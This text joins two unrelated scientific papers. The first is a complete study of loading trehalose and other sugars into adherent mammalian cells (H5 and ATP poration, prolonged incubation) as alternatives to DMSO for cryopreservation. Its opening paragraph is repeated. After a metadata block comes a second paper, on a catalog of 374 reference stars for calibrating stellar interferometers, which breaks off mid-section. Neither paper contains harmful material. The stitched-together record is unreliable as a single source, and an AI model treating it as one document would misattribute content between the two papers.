There is a need for mammalian cell cryopreservation methods that either avoid or improve upon outcomes employing dimethyl sulfoxide (DMSO) as a cryoprotectant. DMSO was the second effective cryoprotectant to be discovered (Lovelock, 1959). Cell cryopreservation usually involves slow rate freezing with DMSO in culture medium and storage below -135°C for later use. Typically as long as there are enough cells surviving to start an expanding proliferating culture the yield of viable cells after thawing is not an important consideration. However, there are instances where cell yield and viability can be very important. Examples include minimization of expensive delays when starting cultures for bioreactor protein manufacturing runs and cellular therapies that involve administering cells into patients for treatment of various diseases, such as cancer. While some cells, for example fibroblasts, are easily cryopreserved other cell types like keratinocytes, hepatocytes, and cardiac myocytes do not freeze well and cell yields are often <50%. Furthermore, current opinion is that DMSO should be removed before cells are infused into patients (Caselli et al., 2009; Junior et al., 2008; Mueller et al., 2007; Otrock et al., 2008; Schlegel et al., 2009). The mechanism for DMSO cytotoxicity has not been determined, however, it is thought to modify membrane fluidity, induce cell differentiation, cause cytoplasmic microtubule changes and metal complexes (Barnett 1978; Katsuda et al., 1984, 1987; Miranda et al., 1978). DMSO also decreases expression of collagen mRNAs in a dose-dependent manner (Zeng et al., 2010).
Introduction
There is a need for mammalian cell cryopreservation methods that either avoid or improve upon outcomes employing dimethyl sulfoxide (DMSO) as a cryoprotectant. DMSO was the second effective cryoprotectant to be discovered (Lovelock, 1959). Cell cryopreservation usually involves slow rate freezing with DMSO in culture medium and storage below -135°C for later use. Typically as long as there are enough cells surviving to start an expanding proliferating culture the yield of viable cells after thawing is not an important consideration. However, there are instances where cell yield and viability can be very important. Examples include minimization of expensive delays when starting cultures for bioreactor protein manufacturing runs and cellular therapies that involve administering cells into patients for treatment of various diseases, such as cancer. While some cells, for example fibroblasts, are easily cryopreserved other cell types like keratinocytes, hepatocytes, and cardiac myocytes do not freeze well and cell yields are often <50%. Furthermore, current opinion is that DMSO should be removed before cells are infused into patients (Caselli et al., 2009;Junior et al., 2008;Mueller et al., 2007;Otrock et al., 2008;Schlegel et al., 2009). The mechanism for DMSO cytotoxicity has not been determined, however, it is thought to modify membrane fluidity, induce cell differentiation, cause cytoplasmic microtubule changes and metal complexes (Barnett 1978;Katsuda et al., 1984Katsuda et al., , 1987Miranda et al., 1978). DMSO also decreases expression of collagen mRNAs in a dose-dependent manner (Zeng et al., 2010).
One strategy for finding interesting new cryoprotectants and cryopreservation strategies is by evaluating what happens in nature . No examples of organisms synthesizing DMSO to survive freezing conditions have been found to date, however several creatures have been found that employ glycerol the first effective cryoprotectant to be discovered (Polge, 1949). Nature has developed a wide variety of organisms and animals that tolerate low temperatures and dehydration stress by accumulation of large amounts of disaccharides, particularly trehalose, including plant seeds, bacteria, insects, yeast, brine shrimp, fungi and their spores, cysts of certain crustaceans, and some soil-dwelling animals. While the cryoprotective capabilities of sucrose and trehalose has been known for years, conventional cryopreservation protocols have generally not employed them even though early work with them demonstrated their ability to protect proteins and membrane vesicles during freezing (Rudolf & Crowe, 1985;Crowe et al., 1990). Trehalose has both major advantages and disadvantages for potential preservation of mammalian cells. On the negative side mammalian cells do not have an active trehalose transport system for uptake of trehalose from the extracellular environment, while on the plus side if you can get it in mammalian cells it is not metabolized giving the opportunity for trehalose to be accumulated to potentially effective preservation concentrations. The purpose of the studies presented here were; 1) to assess or review alternative strategies for delivery of trehalose into mammalian cells, and; 2) to determine whether the benefits were specific to trehalose by investigating alternative sugars employing the same loading strategies.
Cell culture
Cells used in these studies are described in Table 1
Cell poration with H5
The pore-forming protein H5 was obtained from the lab of Hagan Bayley (Bayley, 1994). It is derived from the bacterial toxin -hemolysin, which forms constitutively opened pores in cell membranes. The modified bacterial toxin has been engineered to form pores in the membrane that can be opened and closed by the addition of Zn + . More specific details are www.intechopen.com presented in the discussion. Cells were plated at 10,000-20,000 cells/well the night before in 96 well microtiter plates. The next day, the cells were washed with DMEM containing 1 mM EDTA for 2 minutes and then again with DMEM to remove the EDTA. 0.2M trehalose was added and incubated for 20 minutes at 37 o C followed by the appropriate concentration of H5 for the respective cell type. Cells were porated and loaded with trehalose for 1 hour at 37 o C before addition of DMEM with 25 µM ZnSO 4 or 10% serum to close the pores. Trehalose in DMEM was then added to the wells followed by cryopreservation using a controlled rate freezer (Planar) at ~-1.0 o C/min from 4ºC to -80ºC with a programmed nucleation step at -5.0 o C. Cryopreserved cells were stored overnight at <-135 o C. The next day, the cells were placed at -20 o C for 30 minutes followed by rapid thawing at 37 o C (Campbell et al., 2003;Taylor et al., 2001). The cell cultures were washed twice and then placed at 37 o C for 1 hour to recover under normothermic cell culture conditions before assessment of cell viability.
Pretreatment (Incubation) with trehalose
Cells were plated at 10,000-20,000 cells/well and placed in culture. The next day, the culture medium was replaced with EMEM or DMEM containing trehalose (0-0.6M) and cultured at 37 o C for varying periods of time. After culture, the solution was replaced with fresh medium containing trehalose (0-0.6M) and the cells were cryopreserved using a controlled rate freezer as described for H5 above.
Cell poration with ATP
Cells were plated at 10,000-20,000 cells/well and placed in culture. The next day, the cells were washed with poration buffer (phosphate-buffered saline [PBS] with 1X essential amino acids, 1X Vitastock, 5.5 mM glucose) designed to optimize binding of ATP 4-to the receptor and facilitate formation of the pore. The cells were then placed in 50 µl poration buffer, pH of 7.45, with 0.2M trehalose. A stock solution of 100 mM ATP 4-, pH of 7.45, was made fresh and added to each well to achieve a final concentration of 5 mM. After addition of the ATP 4-, the cells were left at 37 o C for 1 hour to allow sugar uptake. Following incubation, 200 µl of DMEM plus 1 mM MgCl 2 was then added to the cells at 37 o C to close the pores. After 1 hour of recovery from the loading procedure cryopreservation was initiated.
Assessment of cell viability
Cell viability was determined using the non-invasive metabolic indicator alamarBlue™ (Trek Diagnostics). A volume of 20 µl was added to cells in 200 µl of DMEM (10%FCS) and the plate was incubated at 37 o C for 3 hours. Plates were read using a fluorescent microplate reader (Molecular Dynamics) at an excitation wavelength of 544 nm and an emission wavelength of 590 nm. Viability was measured before and after sugar loading, immediately after thawing and at several later time points post-thaw.
Statistical methods
All experiments were repeated at least four times with four replicates in each experiment. Statistical differences were assessed by two way analysis of variance. P-values 0.05 were regarded as significant. www.intechopen.com
H5 poration
One of the first strategies for utilizing disaccharide sugars as cryoprotectants involved the use of a modified pore forming complex. In our initial studies we evaluated the H5 mutanthemolysin (Bayley, 1994) using two adherent cell lines, A10 and CPAE. The earlier studies had been done with cells in suspension (Eroglu et al., 2000). We also evaluated sucrose, another disaccharide sugar that is commonly found in nature, for its potential usefulness as a cryoprotectant. Using the protocol of Eroglu et al as a starting point, a protocol was established for adherent cells. Several parameters were evaluated and included the H5 concentration, time of poration, concentration of trehalose loaded, and time for loading trehalose. Conditions that worked best with adherent cells included 20 minutes for poration followed by 60 minutes for trehalose loading. The highest concentration of trehalose that caused the least drop in cell viability was 0.2M. The optimum H5 concentration varied according to cell type. The A10 smooth muscle cells were porated with 12.5 µg/mL of H5 while the endothelial CPAE cells were porated with 50 µg/mL. In contrast, the fibroblasts and keratinocytes in the literature were porated with 25 µg/mL (Eroglu et al., 2000). Other changes to the protocol were made that benefited viability for adherent cells specifically and included addition of trehalose prior to the addition of H5, the base solution used for poration, and the amount of EDTA (1 mM versus 10 mM) for the removal of Zn + prior to poration. After cryopreservation, however, poor viability was obtained with both cell types. A10 cells demonstrated a viability of 5.57±0.17%. The endothelial cells demonstrated similar viabilities. These values were not as good as those observed when suspended cells were cryopreserved with sugars in the literature. However, it is our experience that adherent cells are generally more difficult to cryopreserve regardless of the cryoprotectant used.
Trehalose exposure without poration
When we started adding the trehalose to cells in the H5 experiments, control cells were exposed to trehalose by addition to the culture medium prior to cryopreservation. An unanticipated observation of cell survival was made with slow rate cryopreserved CPAE cells prompting further investigation. The cells exposed to trehalose overnight were observed to develop vacuoles (Fig 1) suggesting a possible pinocytotic uptake mechanism. After these observations were made, further experiments were designed to examine cell viability after extended trehalose exposure. CPAE cells were exposed to 0.2M trehalose in Dulbecco's Modified Eagle's Medium (DMEM) buffered with 25 mM Hepes for 0-72 hours at 37 o C. After exposure the cells were left in 0.2M trehalose and cryopreserved at ~-1.0 o C/min (Fig. 2). CPAE cell viability was observed immediately after thawing. An exposure time of 24 hours provided the best overall cell survival. Extracellular exposure alone during cryopreservation failed to produce any cell survival. In contrast, A10 smooth muscle cells generally did not survive cryopreservation after trehalose exposure as well as the CPAE endothelial cells. Examination of optimal concentrations of trehalose during incubation and during cryopreservation showed that a concentration of 0.1-0.2M trehalose for incubation produced the best viability with a similar concentration being required during the freezing process. Several other parameters were also examined to further improve cell viability. Other studies have shown that not only the concentration and choice of cryoprotectant but also the vehicle solution for the cryoprotectant can have a significant impact on cell viability after cryopreservation Mathew et al., 2004;Sosef et al., 2005). Initial experiments were performed using DMEM, however, it was observed that CPAE cells, which are grown in EMEM medium, actually preferred exposure to trehalose in EMEM medium. Further experiments examined the buffers used to maintain the pH of the system. Four cell lines were evaluated. CPAE cells demonstrated decreased viability when the zwitteronic buffer, 4-(2-hydroxyethyl)-1-piperazineethanesulfonic acid (HEPES) was used while the other 3 cell lines did not show decreased viability. Rather a combination of HEPES and sodium bicarbonate was preferred by the CPAE cells. This unusual choice of buffer prompted examination of solution pH during incubation, a pH of 7.4 was optimal for all the 4 cell lines tested. Once loaded with sugar, the cells could either be left in the extracellular sugar at another concentration or an alternative cryoprotectant for preservation.
www.intechopen.com
These studies were then extended to include other sugars, sucrose, raffinose, and stachyose (Fig. 3). The potential cryoprotective benefits of these sugars were evaluated and it was found that stachyose was as good as trehalose using an identical protocol, sucrose was not quite as good and raffinose had very little benefit. All cell lines showed evidence of some cell survival days after cryopreservation and thawing. The second smooth muscle cell line, A7R5, demonstrated low levels of viability with stachyose. Both endothelial cell lines, CPAE and BCE, showed good viability after exposure and freezing with sucrose. Overall, the CPAE cell line had the best viability in these experiments. Use of an optimized protocol with trehalose produced excellent post cryopreservation results with 10-14mM intracellular trehalose . Conditions included 24 hours of cell culture with 0.2M trehalose followed by cryopreservation with 0.2-0.4M trehalose in sodium bicarbonate buffered EMEM at pH 7.4 resulting in ~75% post-preservation cell viability .These experiments confirmed that this technique is more effective for endothelial cells than smooth muscle cells and demonstrated that stachyose is effective for cryopreservation.
ATP poration
In addition to the H5 mutant -hemolysin poration strategy, we sought other poration techniques that could be used to permeate mammalian cells with disaccharides. Cells expressing the P2 X7 purinergic cell surface receptor, also known as the P2 z receptor, may be permeabilized by the formation of a channel/pore that allows passage of molecules into and out of the cell when the active form of ATP (ATP 4-) binds to the receptor. Our initial studies focused on determination of whether or not the P2 X7 was expressed on smooth muscle and endothelial cells. Experiments using the ELICA assay demonstrated the presence of the P2 X7 receptor on both endothelial and smooth muscle cell lines to varying degrees (Fig 4). The smooth muscle cell lines demonstrated the greatest density of the receptor. ATP-permeabilized cells retained better viability than untreated cells both immediately after thawing and five days later (Fig 5). Immediate metabolic activity in A7R5 and CPAE cells demonstrated dependence upon increasing ATP concentrations, while for A10 and BCE cells immediate metabolic activity was increased at all ATP concentrations with only slight improvement at the higher concentrations tested. However, survival at five days demonstrated that intermediate concentrations of ATP (0.5-2.5mM) were best. Further cryopreservation studies were performed to optimize cell survival resulting in at least 25% cell survival for both endothelial cell lines but only low levels of survival for the smooth muscle cells. www.intechopen.com
Discussion
As cryopreservation has been applied to cells and tissues for clinical use, concerns about toxicity relating to the various cryoprotectants being used, particularly DMSO, have developed. Because of this, there has been renewed interest in finding less toxic cryoprotectants. The cryoprotective capabilities of some sugars, disaccharide sugars in particular, has been known for years and early work with them demonstrated their ability to protect proteins and membrane vesicles during freezing (Crowe et al., 1990;Rudolph & Crowe, 1985). Coupled with these early studies are observations made in nature regarding organisms that can survive extremes in temperature and desiccation due to their ability to accumulate large amounts of disaccharide sugars, specifically trehalose and sucrose, until more favorable conditions are available. The protective effects of trehalose and sucrose have been determined and may be classified under two general mechanisms: (1) "the water replacement hypothesis" or stabilization of biological membranes and proteins by direct interaction of sugars with polar residues through hydrogen bonding, and (2) stable glass formation (vitrification) by sugars in the dry state (Crowe et al., , 1988(Crowe et al., , 1998(Crowe et al., , 2001Slade & Levine, 1991).
Two primary stresses that destabilize membranes have been defined, fusion and lipid phase transition. Studies have shown that when the water that hydrates the phospholipid molecules of the membrane is removed, packing of the head groups increases. The result is an increase in van der Waals interactions and a dramatic increase in the phase transition temperature (T m ) (Crowe et al., , 1988(Crowe et al., , 1990(Crowe et al., , 1991. At the phase transition the phospholipid bilayer shifts from a gel phase to a liquid crystalline phase, the state normally observed in fully hydrated cells. For example, the T m of a cell membrane might be -10 o C when fully hydrated but when water is removed the T m increases to over 100 o C. Thus, the membrane is in the gel phase at room temperature. As the membrane shifts between the gel phase and the liquid crystalline phase it becomes transiently leaky allowing its intracellular contents to leak out. Therefore it would be advantageous to avoid the lipid phase transition as this can compromise the health of a rehydrated cell. Addition of disaccharide sugars, in particular trehalose, depresses T m allowing the membrane to remain in the liquid crystalline state even when dried, so that upon rehydration no phase transition takes place and no transient leaking. During cryopreservation water is not necessarily lost, but it undergoes a phase change forming ice as the temperature drops and depending upon the rate of cooling, the cells become more or less dehydrated rendering the cells vulnerable to damage by mechanisms similar to those proposed for desiccated cells. The stabilizing effect of these sugars has been shown in a number of model systems including liposomes, membranes, viral particles, and proteins. The mechanism by which disaccharide sugars are able to decrease the T m for a given bilayer has been elucidated. Interactions take place between the sugars and the -OH groups of the phosphate in the phospholipid membrane preventing interaction or fusion of the head groups as the structural water is removed (Crowe et al., , 1988(Crowe et al., , 1989a(Crowe et al., , 1989b. Although not as well understood, a similar mechanism of action stabilizes proteins during drying (Carpenter et al., 1986(Carpenter et al., , 1987a(Carpenter et al., , 1987b(Carpenter et al., , 1989. Despite their protective qualities, the use of these sugars in mammalian cells has been somewhat limited mainly because mammalian cell membranes are impermeable to disaccharides or larger sugars and there is strong evidence that sugars need to be present on both sides of the cell membrane in order to be effective (Crowe et al., 2001;Eroglu et al., 2000;Beattie et al., 1997). This is why, in addition to loading sugars, we added sugars to the cryopreservation solution just before initiating cooling.
In addition to trehalose and sucrose, we were interested in other sugars that could be used as cryoprotectants avoiding monosacharides that would likely be degraded in the cell. Larger more complex sugars such as disaccharides or larger would be less likely to be degraded and utilized inside cells and might therefore be more stable as cryoprotectants.
The comparative structures of the sugars we considered for preservation of mammalian cells are illustrated in Figure 6. Three other sugars were evaluated besides trehalose and included sucrose, raffinose and stachyose. Sucrose and trehalose are both non-reducing sugars, so they do not react with amino acids or proteins and should be relatively stable under low pH conditions and at temperature extremes. Raffinose is a trisaccharide and stachyose is a tetrasaccharide. , 2001). We have since used these conditions to cryopreserve several adherent cell types (Campbell et al., , 2010. Our rationale for using this adherent model was twofold. First, due to our interest in regenerative medicine we thought that adherent cells more closely mimicked cells in tissue engineered devices. Second, we thought there might be a market for cells cryopreserved on plates for research and cytotoxicity testing, CryoPlate™. More recently another group has been using adherent cells for investigation of preservation by vitrification and drying and have reported on cryopreservation of adherent pluripotent stem cells (Katkov et al., 2006;Katkov et al., 2011;). Katkov et al. presented results for preservation of human embryonic stem cells in 4-well plates and pointed out several advantages of cryopreservation in adherent mode. These included elimination of possible bias due to selective pressure within a pluripotent stem cell line after cryopreservation and distribution of multiwell plates for immediate use for embryotoxicity and drug screening in pluripotent stem cell-based toxicology in vitro kits (Katkov et al., 2011).
There are several methods in the literature that could be employed for intracellular delivery of these sugars including those already discussed ; Table 2). Many drugs, therapeutic proteins and small molecules have unfavorable pharmacokinetic properties and do not readily cross cell membranes or other natural physiological barriers within the body. This has resulted in the search for and discovery of alternative methods to transport materials, like sugars, across mammalian cell membranes.
Some of these strategies have been presented in depth in the results sections. The first involved the use of the Staphylococcus aureus toxin, -hemolysin. This toxin is produced as a monomer by the bacteria. It then oligomerizes to form pores on mammalian cell membranes. Hagan Bayley and his group modified the wild type -hemolysin protein by replacing 4 native residues with histidines, termed H5. In addition to pore formation on cell membranes, the H5 mutant also enabled it to be opened and closed at will. When inserted into the membrane, it is open and molecules up to 3000 daltons are able to pass through. Then the pores are closed in the presence of Zn + . To reopen the pore, addition of a chelating agent such as EDTA will remove the Zn + and the pore is ready to be used again (Bayley, 1994;Walker et al., 1995). Early studies showed that H5 could create pores in mammalian cell membranes and that they could be used for efficient intracellular loading of trehalose (Eroglu et al, 2000;Acker et al., 2003). Our experiments with H5 worked well initially using adherent cells. The results demonstrated good poration and loading of trehalose into cells. However, after adherent cells were cryopreserved, their viability was not very good (<6%). At this point in our studies, several issues arose that prevented further studies using H5. First, the H5 pore was derived from the bacterial toxin -hemolysin so there were concerns raised whether regulatory approval could be obtained if it was ever to be used clinically with human cells and tissues. There were some indications during these studies that the pores were shed from the membrane over time. However, H5 was still detectable in picogram quantities after 7 days in culture. Finally, as new batches of H5 were delivered the activity varied greatly and more H5 was required to achieve the same level of poration compared with earlier batches. Ultimately the batch variation was attributed to a protein stability issue. When these issues were not resolved other strategies for introducing trehalose into cells were explored.
An unexpected outcome of our H5 experiments was the development of a new, simple strategy for introduction of trehalose into cells which involved incubating cells in sugar for www.intechopen.com extended periods of time at physiological temperature . One possible mechanism to explain this observation was that the trehalose is substituting for water molecules in the cell membranes keeping the membrane stable and preventing it from going through a phase transition (Crowe et al., 1988. A second mechanism is most likely an active uptake mechanism involving endocytosis similar to that proposed for loading of trehalose by Oliver et al (Oliver et al., 2004). Her results suggested that human MSCs are capable of loading trehalose from the extracellular space by a clathrin-dependent fluidphase endocytotic mechanism that is microtubule-dependent but actin-independent (Oliver et al., 2004). Further research is required to elucidate the mechanism by which culture in the presence of trehalose facilitates cell cryopreservation and determine the degree of cell viability retention under different storage conditions.
The last method presented was poration using the P2 z receptor and ATP. This was a somewhat unique strategy in that it took advantage of the cell's own machinery. It was shown that cells expressing the P2 X7 purinergic cell surface receptor, also known as the P2 z receptor, could be permeabilized when the receptor binds to ATP 4-. The interaction with ATP resulted in the formation of a non-selective pore that allows molecules up to ~900 Daltons to pass through (Nihei et al., 2000). The P2 X7 receptor selectively binds to only ATP 4whose presence in solution is dependent on temperature, pH, and the concentration of divalent cations such as Mg 2+ . Closure of the pore after activation by ATP is achieved by simply removing ATP from the system or adding exogenous Mg 2+ that has a high affinity for the active form of ATP, ATP 4-. The P2 z receptor is found on a number of cell types including cells of hematopoietic origin (Nihei et al, 2000). There were several factors that likely affected the cell viability and survival of cells after ATP poration. First, is the density of the receptor on the cells which directly affects the amount of trehalose that can be loaded into the cells and how long it takes. Another factor is that poration with ATP tends to promote the detachment of adherent cells from their substrate. Part of the protocol requires a recovery period of 1 hour at 37 o C to allow cells that may have been perturbed by the poration process the chance to settle back onto their substrate. Finally, cell loss is at least in part due to apoptosis. There is evidence in the literature that poration with ATP induces apoptosis in some cell types (Murgia et al., 1992).
In marked contrast the human stem cell line, TF-1, demonstrated excellent post cryopreservation survival (Buchanan et al., 2004;. We have exposed TF-1 cells to ATP with trehalose for 1 hour followed by a 10-fold dilution of the ATP and inactivation of the active form of ATP (ATP 4-) by the addition of 1 mM MgCl 2 followed by a 1-hour recovery period at 37 o C . When the cells were compared to cells cryopreserved with 10% DMSO, the DMSO group demonstrated greater initial viability close to 100% that steadily declined over days in culture post thaw. However by day 4 of culture postcryopreservation cells cryopreserved in disaccharides were similar to the viability of cells cryopreserved in DMSO. Similarly colony forming assays with TF-1 cells demonstrated similar outcomes compared with DMSO. Furthermore, the use of disaccharides, trehalose and sucrose, appeared to result in similar results at both slow (1°C/min) and rapid (100°C/min) cooling rates. Buchanan et al (Buchanan et al., 2010) have extended these studies obtaining excellent TF-1 cell line and cord blood-derived multipotential hematopoietic progenitor cell survival after freeze drying and storage at room temperature for 4 weeks! It is studies such as Buchanan's that keep us optimistic that disaccharide introduction/preservation strategies can be developed for preservation of other mammalian www.intechopen.com cell types. Further development work is required with the cell culture and P2 x7 methods with the promise of preservation by freezing and freeze-drying.
H5
Derived from -hemolysin, which normally forms a constitutively opened pore in the membrane. Engineered to close in the presence of Zn+ or serum.
Derived from a bacterial toxin. Batch to batch variation and instability.
Acker Bayley, 1994Eroglu et al. 2000 ATP The naturally occurring p2 x7 receptor forms a nonspecific pore upon binding of ATP 4-able to allow molecules <900 daltons to pass through.
P2 x7 receptor found on some but not all cell types. Buchanan et al. 2005 Culture methods There are still other methods in the literature that could lead to intracellular delivery of disaccharides in addition to those already discussed Table 2). One method takes advantage of the lipid phase transition described above when the cell membrane is exposed to changes in temperature. As the membrane changes from the liquid crystalline phase to the gel phase it becomes leaky providing an opportunity to introduce molecules into the cell that would not normally cross like trehalose. Beattie used this method to cryopreserve pancreatic islets by introducing DMSO and trehalose into the islets during the thermotropic phase transition between 5 and 9 o C. The islets were then cryopreserved in combination with DMSO and the viability of the islets after thawing was greater than when DMSO alone was used, 94% versus 58% (Beattie et al., 1997). In a related study, Mondal et al, cryopreserved kidney cells (MDBK) using 264 mM trehalose. The cells were suspended in trehalose with 20% fetal bovine serum in culture medium then incubated at 40 o C for 1 hour before slow rate cooling for storage at -80 o C. Viability was measured using Trypan Blue exclusion at 74% upon thawing (Mondal, 2009).
In another variation for loading molecules into cells, a number of proteins have been discovered that possess the ability to cross the cell membrane. These protein transduction domains (PTDs) generally correspond to portions of native proteins. Examples of PTDs include the Tat protein from the human immunodeficiency virus type I, the envelope glycoprotein E rns from the pestivirus and the DNA binding domains of leucine zipper proteins such as c-fos, c-jun and yeast transcription factor GCN4 (Futaki et al., 2001(Futaki et al., , 2004Langedijk, 2002;Langedijk et al., 2004;Lindgren et al., 2000;Richard et al., 2003;Vives et al., 1997). These PTDs are short cationic peptides that cross the cell membrane in a concentration-dependent manner that is independent of specific receptors or other transporters. The exact mechanism of translocation has not been defined. Enrichment of basic amino acids, particularly arginine and in some instances lysine, have been shown to be important for the translocation activity (Futaki et al., 2001(Futaki et al., , 2004Vives et al., 1997). Some studies have suggested that endocytosis is involved (Lundberg & Johansson, 2002;Richard et al., 2003), however, the current theory includes interaction with glycosaminoglycans and uptake by a non-endocytotic mechanism that may involve the charged heads of the phospholipid groups within the cell membrane. (Langedijk, 2002;Langedijk et al., 2004;Mai et al., 2002).
While most of these peptides need to be cross linked to the molecule of interest, there are peptides that can move proteins and other peptides across the membrane without the requirement for cross-linking. Examples include Pep-1, a 21-residue peptide which contains three domains; a tryptophan rich region (5 residues) for targeting the membrane and forming hydrophobic interactions; a lysine rich domain to improve intracellular delivery whose design was taken from other nuclear localization sequences from other proteins like the simian virus 40 large T antigen, and, a spacer region with proline that provides flexibility and maintenance of the other two regions. When mixed with other peptides or proteins, Pep-1 rapidly associates and forms a complex with the protein of interest by noncovalent hydrophobic interactions to form a stable complex. Once in the cytoplasm the peptide dissociates from the protein that has been carried across the membrane causing little if any interference regarding the protein's final destination or function. The process occurs by an endocytosis independent mechanism (Morris et al., 1999(Morris et al., , 2001. We anticipate that such peptides may eventually lead to methods for introduction of disaccharides into mammalian cells . Another alternative method is electroporation, also called electropermeabilization, which involves the application of an electric pulse that briefly permeabilizes the cell membrane. Since its introduction in the 1980's it has been primarily used to transfect mammalian cells and bacteria with genetic material. Initially electroporation tended to kill most cells. However, further work and development of the electroporation process, such as alternate electrical pulses like the square wave pulse, have refined the process so that better permeabilization and cell viability can be achieved (Gehl, 2003;Hapala, 1997;Heiser, 2000). The formation of pores, their size and the recovery of the membrane are important factors that influence the success of an electroporation protocol (Gehl, 2003;Hapala, 1997;Heiser, 2000). Most importantly, electroporation is applicable to all cell types.
It was hypothesized that trehalose provided protection during electropermeabilization in a manner similar to chelating agents such as EDTA or lipids like cholesterol (Katkov, 2002; www.intechopen.com Mussauer et al., 2001). Effective electroporation protocols are a balance between how much material can be loaded into the cells and cell survival after membrane permeabilization. So, while it cannot be predicted how well certain cell types will respond to electroporation, there is ample evidence that electroporation can be used with a reasonably certainty of success. A short culture period may be all that is required to permit restabilization of membranes post-electroporation. Additionally, like trehalose which interacts with membranes under stressful conditions such as drying, other compounds, such as cholesterol and unsaturated fatty acids, can also interact with membranes and may facilitate resealing of the membranes increasing overall cell survival (Katkov, 2002). Efficient resealing of cell membranes after permeabilization is thought to be essential for promoting cell recovery (Gehl et al., 1999) and compounds such as Poloxamer 188 facilitate membrane resealing (Lee et al., 1992).
Conclusion
In conclusion, there are multiple potential ways to introduce trehalose into mammalian cells and in some cases excellent cell preservation can be achieved. However, it is clear that methods for each cell type will need to be diligently developed and many years of work remain before we can replace DMSO as the lead cryoprotectant. In the mean time, we must not forget that there are other relatively low molecular weight sugars available. Preliminary evidence suggests that with further work sucrose and stachyose may, in some cases, be equally effective for cell preservation.
Acknowledgements
We would like to thank Elizabeth Greene for her assistance in the preparation of this manuscript. This work was supported by a cooperative agreement (No. 70NANB1H3008) between the U.S. Department of Commerce, National Institute of Standards and Technology-Advanced Technology Program, and Organ Recovery Systems, Inc www.intechopen.com | 2017-09-08T10:03:00.274Z | 2012-03-14T00:00:00.000 | {
"year": 2012,
"sha1": "2fc7338d09dadf49478391e6afa833526e935b51",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.5772/32979",
"oa_status": "HYBRID",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "b32c339ffdf0b5bad233c16d8803de8ecfa93d11",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Chemistry"
]
} |
14348182 | pes2o/s2orc | v3-fos-license | A catalog of reference stars for long baseline stellar interferometry
The calibration process of long baseline stellar interferometers requires the use of reference stars with accurately determined angular diameters. We present a catalog of 374 carefully chosen stars among the all-sky network of infrared sources provided by Cohen et al. 1999. The catalog benefits from a very good sky coverage and a median formal error on the angular diameters of only 1.2%. Besides, its groups together in a homogeneous handy set stellar coordinates, uniform and limb-darkened angular diameters, photometric measurements, and other parameters relevant to optical interferometry. In this paper, we describe the selection criteria applied to qualify stars as reference sources. Then, we discuss the catalog's statistical properties such as the sky coverage or the distributions of magnitudes and angular diameters. We study the number of available reference stars as a function of the baseline and the precision needed on the visibility measurements. Finally, we compare the angular diameters predicted in Cohen et al. 1999 with existing determinations in the literature, and find a very good agreement.
INTRODUCTION
Astronomical optical interferometers need to be calibrated not only against long term drifts but also against short term effects due to the atmospheric turbulence. The usually adopted solution consists in interleaving observations of scientific targets and reference sources. A reference source is an astronomical source for which the theoretical fringe contrast, or visibility, can be predicted with a high accuracy. The visibility of the scientific target can then be deduced from the equation where µ denotes a measured fringe contrast and V a visibility. The reference sources that have the most simple model are non-resolved or almost non-resolved single stars with compact atmospheres, and will be called reference stars or calibrators in the following. They can be correctly described by a uniform disk (UD) model whose visibility is where σ eff is the effective wavenumber (see Sect. 3.4), B the interferometric baseline projected on the sky, and θ UD the stellar angular diameter. As many instrumental effects depend on the direction aimed at the sky, it is preferable that the reference star be close to the target. Hence arises the need for a grid of such stars with a good sky coverage. In this paper, we describe the catalog of reference stars that was made up for that purpose by the FLUOR 2 team (more details will be available in a forthcoming paper 3 ).
In Sect. 2, we explain the selection process of our reference stars. Section 3 describes the catalog's content and Sect. 4 its statistical properties. Finally, we compare the angular diameters of our reference stars to other existing determinations in Sect. 5.
SELECTION OF REFERENCE STARS
As explained in the introduction, reference stars have to be non-variable single stars with compact atmospheres and accurately known angular diameters. In order to build there all-sky network of absolutely calibrated stellar spectra, Martin Cohen and collaborators 1 have used criteria that match quite well are requirements. Moreover, they have derived angular diameters with formal errors by fitting Kurucz's atmosphere models to stellar spectra of some prototype stars. By making the fundamental assumption that every K0-M0 giant has a spectrum identical to its prototype, they have extended their collection of spectra to 422 well chosen stars by rescaling them in flux thanks to photometric measurements. Angular diameters are then derived using the scaling factor. In the following, this method will referred to as the spectro-photometric method (SPM).
We have taken advantage of this existing network by extracting a subset of reference stars suitable for the calibration of stellar interferometers. Our extra requirements are essentially the absence of significantly variable (> 0.01 mag) and close binary stars that would both necessitate a model more elaborate than Eq. (2). The initial network is then cross-checked with the Simbad database † , the Batten catalog of spectroscopic binaries, 4 and the catalog of visual double stars observed by Hipparcos. 5 We choose to discard all double stars with separations less than 4 ′′ , and to avoid pointing confusion, we keep double stars with separations between 4 ′′ and 30 ′′ only when the companion is five magnitudes fainter than the primary. Companions' magnitudes and separations are notified in the comments. As a result of this more stringent selection, our catalog is left wih 374 entries.
Star identification
The catalog is meant to group together all useful information in the context of long baseline stellar interferometry (LBSI). The Henry Draper (HD) number has been chosen as the main identifier in the catalog (the Bright Star † http://simbad.u-strasbg.fr/Simbad Catalog number, denoted HR, is also provided for convenience). As the knowledge of these stars is likely to be improved in the future, it is very important to keep track of the calibrator(s) used for a given scientific observation, so that any data could be reduced again if necessary. Additionally, it makes easier the search for observations that used the same calibrator(s) and that are thus correlated. 6 Identifiers (HD, HR, and Bayer or Flamsteed name) are followed by the stellar coordinates, some physical properties, angular diameters in different bands, some cross-properties of the star and FLUOR, the photometry, and some comments (Table 1).
Angular diameters
Limb-darkened angular diameters have been computed in Ref. 1 for every star. This diameter corresponds to the physical diameter of the star, i.e. the one that appears in the Stefan-Boltzmann law where F bol is the bolometric flux (W/m 2 ) emitted by the star and σ S denotes Stefan-Boltzmann constant. As such, θ LD is independent of the observational wavelength. This diameter can be converted into the UD angular diameter of Eq. (2), usually used by interferometrists. However, the latter depends on the wavelength, so a spectral band has to be specified. The following formula 7 provides an efficient way to perform the conversion using linear limb-darkening coefficients u λ : For every star, we interpolate u λ into the tables computed in Ref. 8 using the effective temperature T eff and the surface gravity log(g) derived from the spectral type. 9, 10 Then, Eq. 4 yields UD angular diameters in the J, H, and K bands. As the conversion process introduces an additional although very small error, the catalog states the new uncertainty for every UD diameter.
Photometry
For every star, the catalog features the B and V magnitudes drawn from the Simbad database, and the J to N infrared magnitudes taken from Ref. 1, or estimated from the spectral type using the tables in Refs. 11 and 12. A boolean flag indicates whether the quoted value is a measurement or not.
Effective wavenumber and shape factor
The effective wavenumber and the shape factor are cross-properties of the star's spectrum and of the instrument.
